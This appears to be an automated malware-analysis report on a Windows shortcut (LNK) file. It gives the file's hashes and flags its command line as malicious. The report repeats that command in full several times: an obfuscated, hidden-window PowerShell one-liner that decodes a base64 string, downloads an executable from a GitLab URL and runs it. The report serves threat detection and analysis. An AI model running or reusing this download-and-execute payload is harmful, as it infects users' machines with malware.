| Hash | Hash Value |
|---|---|
| MD5 | 64ff7bfcea29963681fa0017f3811983 |
| Sha1 | 2f138f18d57a8f5633b952ea5abd6074459bdae0 |
| Sha256 | 1ba43b5fc228be721cb57394e2d0999ddbbf34d0cb4c00998bce241eb41c546a |
| Sha384 | 025f943765c6e7b96f26c83fa63fe5af81cc36ec05efd52f69ae28ff9e538b745860dc0b2c653c54d4b4007122f6580b |
| Sha512 | 152fe0973515c8e61856cb4eed8c531e0ae3a3330d3ca3b6ccd671fd86e652fe3d92a68f1d88e05b8188cb43f6b14967160d3af3b2112d299b031f967f547056 |
| SSDeep | 1536:jafW6pTEZ43eXLsOqbDmm/JG/W0IstFBWIor:jeW6pTE+OZyDb/JG/iSFBWIor |
| TLSH | DD53F11609A1836ED571CC71B9C526094A73F8AAEB31EB29484E66434FC3C3E351D73D |

| Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 > LNK CommandLine > [Deobfuscated PS] |